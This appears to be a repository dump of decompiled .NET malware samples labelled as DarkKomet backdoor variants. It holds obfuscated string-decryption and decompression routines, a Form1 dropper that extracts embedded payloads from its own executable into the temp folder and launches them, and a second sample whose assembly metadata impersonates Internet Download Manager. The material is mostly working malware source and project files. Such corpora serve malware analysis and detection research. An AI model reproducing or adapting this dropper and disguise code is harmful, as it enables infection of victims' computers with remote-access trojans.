short count = (short) ((int) \u000E.\u0003.ReadInt16() ^ (int) (short) (~--~~-~-~-1471310255 ^ 1471284911));
if (count == (short) 0)
\u000E.\u0008 = (short) ((int) \u000E.\u0003.ReadInt16() ^ (int) (short) ~-~--~~-~17028);
else
\u000E.\u0005 = \u000E.\u0003.ReadBytes((int) count);
Assembly assembly = executingAssembly;
AssemblyName assemblyName;
try
{
assemblyName = assembly.GetName();
}
catch
{
assemblyName = new AssemblyName(assembly.FullName);
}
\u000E.\u000E = assemblyName.GetPublicKeyToken();
if (\u000E.\u000E != null && \u000E.\u000E.Length == 0)
\u000E.\u000E = (byte[]) null;
\u000E.\u0006 = \u000E.\u0006 & 268435314 ^ 6788;
}
int num1 = _param0 ^ 759805953;
\u000E.\u0003.BaseStream.Position = (long) num1;
byte[] numArray2;
if (\u000E.\u0005 != null)
{
numArray2 = \u000E.\u0005;
}
else
{
short count = \u000E.\u0008 != (short) -1 ? \u000E.\u0008 : (short) ((int) \u000E.\u0003.ReadInt16() ^ -19352 ^ num1);
numArray2 = count != (short) 0 ? \u000E.\u0003.ReadBytes((int) count) : (byte[]) null;
}
int num2 = \u000E.\u0003.ReadInt32() ^ num1 ^ -~~--~~-~-~-904937009 ^ 1890831825;
if (num2 == -2)
{
numArray1 = \u000E.\u0003.ReadBytes(4);
_param0 = 1162081278;
}
else
{
bool flag1 = (num2 & int.MinValue) != 0;
bool flag2 = (num2 & 1073741824) != 0;
int count = num2 & 1073741823;
byte[] numArray3 = \u000F.\u0002(numArray2, \u000E.\u0003.ReadBytes(count));
if (\u000E.\u000E != null != (\u000E.\u0006 != 1607814))
{
for (int index = 0; index < count; ++index)
{
byte num3 = \u000E.\u000E[index & 7];
byte num4 = (byte) ((int) num3 << 3 | (int) num3 >> 5);
numArray3[index] = (byte) ((uint) numArray3[index] ^ (uint) num4);
}
}
int num5 = \u000E.\u0006 - 12;
byte[] bytes;
int length;
if (!flag2)
{
bytes = numArray3;
length = count;
}
else
{
length = (int) numArray3[2] | (int) numArray3[0] << 16 | (int) numArray3[3] << 8 | (int) numArray3[1] << 24;
bytes = new byte[length];
\u000E.\u0002(numArray3, 4, bytes);
}
string str2;
if (flag1 && num5 == 1607802)
{
char[] chArray = new char[length];
for (int index = 0; index < length; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
int num6 = num5 + ((int) sbyte.MaxValue + (num5 & 3) << 5);
if (num6 != 1611930)
str2 = (_param0 + count ^ 936568 ^ num6 & 1293).ToString("X");
string str3 = string.Intern(str2);
\u000E.\u0002.Add(_param0, str3);
if (\u000E.\u0002.Count == 6)
{
\u000E.\u0003.Close();
\u000E.\u0003 = (BinaryReader) null;
\u000E.\u0005 = \u000E.\u000E = (byte[]) null;
}
return str3;
}
}
return str1;
}
}
private static int \u0002(byte[] _param0, int _param1, byte[] _param2)
{
int num1 = 0;
int num2 = 0;
int num3 = 128;
int length = _param2.Length;
label_9:
while (num1 < length)
{
if ((num3 <<= 1) == 256)
{
num3 = 1;
num2 = (int) _param0[_param1++];
}
if ((num2 & num3) != 0)
{
int num4 = ((int) _param0[_param1] >> 2) + 3;
int num5 = ((int) _param0[_param1] << 8 | (int) _param0[_param1 + 1]) & 1023;
_param1 += 2;
int num6 = num1 - num5;
if (num6 < 0)
return -1;
while (true)
{
if (--num4 >= 0 && num1 < length)
_param2[num1++] = _param2[num6++];
else
goto label_9;
}
}
else
_param2[num1++] = _param0[_param1++];
}
return 0;
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_000F.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
internal static class \u000F
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_10_June/Form1.cs
+167
View File
@@ -0,0 +1,167 @@
// Decompiled with JetBrains decompiler
// Type: _10_June.Form1
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace _10_June
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer \u0002;
[DebuggerNonUserCode]
public Form1()
{
this.Load += new EventHandler(this.\u0002);
this.\u0002();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.\u0002 == null)
return;
this.\u0002.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void \u0002()
{
this.\u0002 = (IContainer) new System.ComponentModel.Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = \u000E.\u0002(759806067);
}
private void \u0002(object _param1, EventArgs _param2)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
string tempPath = Path.GetTempPath();
label_2:
num3 = 3;
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
label_3:
num3 = 4;
string Expression = Strings.Space(checked ((int) FileSystem.LOF(1)));
label_4:
num3 = 5;
FileSystem.FileGet(1, ref Expression);
label_5:
num3 = 6;
FileSystem.FileClose(1);
label_6:
num3 = 7;
string[] strArray = Strings.Split(Expression, \u000E.\u0002(759806079));
label_7:
num3 = 8;
FileSystem.FileOpen(3, tempPath + strArray[3], OpenMode.Binary, OpenAccess.ReadWrite);
label_8:
num3 = 9;
FileSystem.FilePut(3, strArray[1], -1L, false);
label_9:
num3 = 10;
FileSystem.FileClose(3);
label_10:
num3 = 11;
FileSystem.FileOpen(5, tempPath + strArray[4], OpenMode.Binary, OpenAccess.ReadWrite);
label_11:
num3 = 12;
FileSystem.FilePut(5, strArray[2], -1L, false);
label_12:
num3 = 13;
FileSystem.FileClose(5);
label_13:
num3 = 14;
Process.Start(tempPath + strArray[3]);
label_14:
num3 = 15;
Process.Start(tempPath + strArray[4]);
label_15:
num3 = 16;
this.Close();
ProjectData.EndApp();
goto label_22;
label_17:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
goto label_11;
case 13:
goto label_12;
case 14:
goto label_13;
case 15:
goto label_14;
case 16:
goto label_15;
case 17:
goto label_22;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_17;
}
throw ProjectData.CreateProjectError(-2146828237);
label_22:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_10_June/My/MySettings.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: _10_June.My.MySettings
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace _10_June.My
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
public MySettings()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerNonUserCode]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!\u0005.\u0002().SaveMySettingsOnExit)
return;
\u0006.\u0002().Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
\u0005.\u0002().Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!\u0005.\u0002().SaveMySettingsOnExit)
return;
\u0006.\u0002().Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_10_June/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/         ​ 
BIN
View File
Binary file not shown.
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCopyright("Tonec Inc., Copyright © 1999 - 2011")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("Internet Download Manager (IDM)")]
[assembly: AssemblyDescription("IDMan")]
[assembly: AssemblyCompany("Tonec Inc.")]
[assembly: AssemblyTitle("Internet Download Manager (IDM)")]
[assembly: AssemblyTrademark("Internet Download Manager")]
[assembly: AssemblyFileVersion("6.5.8.1")]
[assembly: Guid("ed21cb1e-a68f-46ba-9dee-b698d8a0942e")]
[assembly: PoweredBy("Powered by SmartAssembly 6.0.0.513")]
[assembly: AssemblyVersion("6.5.8.1")]
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/Backdoor.Win32.DarkKomet.gwon.csproj
+245
View File
@@ -0,0 +1,245 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8F169AE4-7D42-4C0A-93A6-13C78CF48A05}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Idm</AssemblyName>
<ApplicationVersion>6.5.8.1</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web.Services" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_001A_0002.cs" />
<Compile Include="_001B_0002.cs" />
<Compile Include="_001C_0002.cs" />
<Compile Include="_001D_0002.cs" />
<Compile Include="_001E_0002.cs" />
<Compile Include="_001F_0002.cs" />
<Compile Include="_007F_0002.cs" />
<Compile Include="_0080_0002.cs" />
<Compile Include="_0081_0002.cs" />
<Compile Include="_0082_0002.cs" />
<Compile Include="_0083_0002.cs" />
<Compile Include="_0084_0002.cs" />
<Compile Include="_0086_0002.cs" />
<Compile Include="_0087_0002.cs" />
<Compile Include="_0088_0002.cs" />
<Compile Include="_0089_0002.cs" />
<Compile Include="_008A_0002.cs" />
<Compile Include="_008B_0002.cs" />
<Compile Include="_008C_0002.cs" />
<Compile Include="_008D_0002.cs" />
<Compile Include="_008E_0002.cs" />
<Compile Include="_008F_0002.cs" />
<Compile Include="_0090_0002.cs" />
<Compile Include="_0091_0002.cs" />
<Compile Include="_0092_0002.cs" />
<Compile Include="_0093_0002.cs" />
<Compile Include="_0094_0002.cs" />
<Compile Include="_0095_0002.cs" />
<Compile Include="_0096_0002.cs" />
<Compile Include="_0097_0002.cs" />
<Compile Include="_0098_0002.cs" />
<Compile Include="_0099_0002.cs" />
<Compile Include="_009A_0002.cs" />
<Compile Include="_009B_0002.cs" />
<Compile Include="_009C_0002.cs" />
<Compile Include="_009D_0002.cs" />
<Compile Include="_009E_0002.cs" />
<Compile Include="_009F_0002.cs" />
<Compile Include="_0001_0003.cs" />
<Compile Include="_0002_0003.cs" />
<Compile Include="_0003_0003.cs" />
<Compile Include="_0004_0003.cs" />
<Compile Include="_0005_0003.cs" />
<Compile Include="_0006_0003.cs" />
<Compile Include="_0007_0003.cs" />
<Compile Include="_0008_0003.cs" />
<Compile Include="_000E_0003.cs" />
<Compile Include="_000F_0003.cs" />
<Compile Include="_0010_0003.cs" />
<Compile Include="_0011_0003.cs" />
<Compile Include="_0012_0003.cs" />
<Compile Include="_0013_0003.cs" />
<Compile Include="_0014_0003.cs" />
<Compile Include="_0015_0003.cs" />
<Compile Include="_0016_0003.cs" />
<Compile Include="_0017_0003.cs" />
<Compile Include="_0018_0003.cs" />
<Compile Include="_0019_0003.cs" />
<Compile Include="_001A_0003.cs" />
<Compile Include="_001B_0003.cs" />
<Compile Include="_001C_0003.cs" />
<Compile Include="_001D_0003.cs" />
<Compile Include="_001E_0003.cs" />
<Compile Include="_001F_0003.cs" />
<Compile Include="_007F_0003.cs" />
<Compile Include="_0080_0003.cs" />
<Compile Include="_0081_0003.cs" />
<Compile Include="_0082_0003.cs" />
<Compile Include="_0083_0003.cs" />
<Compile Include="_0084_0003.cs" />
<Compile Include="_0086_0003.cs" />
<Compile Include="_0087_0003.cs" />
<Compile Include="_0088_0003.cs" />
<Compile Include="_0089_0003.cs" />
<Compile Include="_008A_0003.cs" />
<Compile Include="_008B_0003.cs" />
<Compile Include="_008C_0003.cs" />
<Compile Include="_008D_0003.cs" />
<Compile Include="_008E_0003.cs" />
<Compile Include="_008F_0003.cs" />
<Compile Include="_0090_0003.cs" />
<Compile Include="_0091_0003.cs" />
<Compile Include="_0092_0003.cs" />
<Compile Include="_0093_0003.cs" />
<Compile Include="_0094_0003.cs" />
<Compile Include="_0095_0003.cs" />
<Compile Include="_0096_0003.cs" />
<Compile Include="_0097_0003.cs" />
<Compile Include="_0098_0003.cs" />
<Compile Include="_0099_0003.cs" />
<Compile Include="_009A_0003.cs" />
<Compile Include="_009B_0003.cs" />
<Compile Include="_009C_0003.cs" />
<Compile Include="_009D_0003.cs" />
<Compile Include="_009E_0003.cs" />
<Compile Include="_009F_0003.cs" />
<Compile Include="_0001_0004.cs" />
<Compile Include="_0002_0004.cs" />
<Compile Include="_0003_0004.cs" />
<Compile Include="_0004_0004.cs" />
<Compile Include="_0005_0004.cs" />
<Compile Include="_0006_0004.cs" />
<Compile Include="_0007_0004.cs" />
<Compile Include="_0008_0004.cs" />
<Compile Include="_000E_0004.cs" />
<Compile Include="_000F_0004.cs" />
<Compile Include="_0010_0004.cs" />
<Compile Include="_0011_0004.cs" />
<Compile Include="_0012_0004.cs" />
<Compile Include="_0013_0004.cs" />
<Compile Include="_0014_0004.cs" />
<Compile Include="_0015_0004.cs" />
<Compile Include="_0016_0004.cs" />
<Compile Include="_0017_0004.cs" />
<Compile Include="_0018_0004.cs" />
<Compile Include="_0019_0004.cs" />
<Compile Include="_001A_0004.cs" />
<Compile Include="_001B_0004.cs" />
<Compile Include="_001C_0004.cs" />
<Compile Include="_001D_0004.cs" />
<Compile Include="_001E_0004.cs" />
<Compile Include="_001F_0004.cs" />
<Compile Include="_007F_0004.cs" />
<Compile Include="_0080_0004.cs" />
<Compile Include="_0081_0004.cs" />
<Compile Include="_0082_0004.cs" />
<Compile Include="_0083_0004.cs" />
<Compile Include="_0084_0004.cs" />
<Compile Include="_0086_0004.cs" />
<Compile Include="_0087_0004.cs" />
<Compile Include="_0088_0004.cs" />
<Compile Include="_0089_0004.cs" />
<Compile Include="_008A_0004.cs" />
<Compile Include="_008B_0004.cs" />
<Compile Include="_008C_0004.cs" />
<Compile Include="_008D_0004.cs" />
<Compile Include="_008E_0004.cs" />
<Compile Include="_008F_0004.cs" />
<Compile Include="_0090_0004.cs" />
<Compile Include="_0091_0004.cs" />
<Compile Include="_0092_0004.cs" />
<Compile Include="_0093_0004.cs" />
<Compile Include="_0094_0004.cs" />
<Compile Include="_0095_0004.cs" />
<Compile Include="_0096_0004.cs" />
<Compile Include="_0097_0004.cs" />
<Compile Include="_0098_0004.cs" />
<Compile Include="_0099_0004.cs" />
<Compile Include="_0096_0004\_0095_0004.cs" />
<Compile Include="_0007\_0006.cs" />
<Compile Include="_0008\_00084.cs" />
<Compile Include="_0008\_00083.cs" />
<Compile Include="_0008\_00082.cs" />
<Compile Include="_0008\_0008.cs" />
<Compile Include="_0008\_0006_0002.cs" />
<Compile Include="_0008\_001E_0004.cs" />
<Compile Include="_0010\_000F.cs" />
<Compile Include="_0090\_008F.cs" />
<Compile Include="_0012\_0011.cs" />
<Compile Include="_0012\_0013.cs" />
<Compile Include="_0012\_0014.cs" />
<Compile Include="_000E\_007F.cs" />
<Compile Include="_0006_0002\_0008.cs" />
<Compile Include="_0006_0002\_0006_0002.cs" />
<Compile Include="_0006_0002\_001E_0004.cs" />
<Compile Include="_007F_0004\_001F_0004.cs" />
<Compile Include="_007F_0004\_0080_0004.cs" />
<Compile Include="_007F_0004\_0081_0004.cs" />
<Compile Include="_007F_0004\_0082_0004.cs" />
<Compile Include="_007F_0004\_0084_0004.cs" />
<Compile Include="_007F_0004\_0086_0004.cs" />
<Compile Include="_007F_0004\_0087_0004.cs" />
<Compile Include="_007F_0004\_0089_0004.cs" />
<Compile Include="_007F_0004\_0091_0004.cs" />
<Compile Include="_007F_0004\_0093_0004.cs" />
<Compile Include="SmartAssembly\SmartExceptionsCore\SmartStackFrame.cs" />
<Compile Include="SmartAssembly\Attributes\PoweredByAttribute.cs" />
<Compile Include="Idm\My\MySettings.cs" />
<Compile Include="_001C_0004\_009B.cs" />
<Compile Include="_001C_0004\_009D.cs" />
<Compile Include="_001B_0004\_0091.cs" />
<Compile Include="_001B_0004\_0093.cs" />
<Compile Include="_001B_0004\_0094.cs" />
<Compile Include="_001B_0004\_0001_0002.cs" />
<Compile Include="_001A_0006\_0019_0006.cs" />
<Compile Include="_0092_0004\_0006_0002.cs" />
<Compile Include="_0092_0004\_001E_0004.cs" />
<Compile Include="_0003\_0002.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="{3b5b0266-7005-4590-8529-9827ff51efb1}" />
<EmbeddedResource Include="{8a2cc06e-b699-4a98-98ee-08831fc9c995}" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\{logo}.png" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\current.png" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\data.png" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\default.ico" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\error.png" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\error16.png" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\network.png" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\ok.png" />
<EmbeddedResource Include="SmartAssembly\SmartExceptionsCore\Resources\warning16.png" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/Backdoor.Win32.DarkKomet.gwon.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Idm", "Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.csproj", "{8F169AE4-7D42-4C0A-93A6-13C78CF48A05}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8F169AE4-7D42-4C0A-93A6-13C78CF48A05}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8F169AE4-7D42-4C0A-93A6-13C78CF48A05}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8F169AE4-7D42-4C0A-93A6-13C78CF48A05}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8F169AE4-7D42-4C0A-93A6-13C78CF48A05}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/Idm/My/MySettings.cs
+144
View File
@@ -0,0 +1,144 @@
// Decompiled with JetBrains decompiler
// Type: Idm.My.MySettings
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u001B\u0004;
using \u007F\u0004;
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Idm.My
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings \u0001;
private static bool \u0002;
private static object \u0003;
static MySettings()
{
try
{
// ISSUE: reference to a compiler-generated field
// ISSUE: object of a compiler-generated type is created
MySettings.\u0001 = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
// ISSUE: reference to a compiler-generated field
MySettings.\u0003 = RuntimeHelpers.GetObjectValue(new object());
}
catch (Exception ex)
{
\u0089\u0004.\u0017\u0005(ex);
throw;
}
}
[DebuggerNonUserCode]
public MySettings()
{
try
{
}
catch (Exception ex)
{
\u0089\u0004.\u0018\u0005(ex, (object) this);
